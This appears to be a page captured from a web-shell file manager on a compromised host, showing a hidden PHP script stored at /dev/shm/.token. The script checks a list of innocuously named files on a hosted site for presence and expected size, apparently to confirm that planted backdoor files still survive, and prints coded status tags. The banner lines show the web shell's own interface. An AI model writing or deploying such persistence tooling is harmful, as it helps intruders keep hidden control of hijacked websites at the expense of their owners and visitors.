HEX
Server: LiteSpeed
System: Linux premium321.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
User: paksjuts (1314)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //dev/shm/.token
<?php   $r = '/home/bvkaynrz/rido.studio'; $x = ["/templates/v1/supprimg.php"=>"bd@@1008129@@934",
"/templates/v3/config.bak.php"=>"bd@@1012248@@1023",
"/templates/v2/dataBlocks.class.php"=>"bd@@1012522@@1013",
"/Strict.php"=>"bd@@1019207@@913",
"/include/js/usergroup_12.php"=>"bd@@1044307@@901",
"/images/rankform.php"=>"bd@@1019230@@1015",
"/include/css/ban.php"=>"bd@@1044338@@906",
"/include/CSSPagination.php"=>"bd@@1044365@@1095",
"/desc/manifest.php"=>"bd@@1013148@@844",
"/include/images/functions.ini.php"=>"bd@@1018813@@877",
"/templates/data_extensions.php"=>"bd@@1019382@@960"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');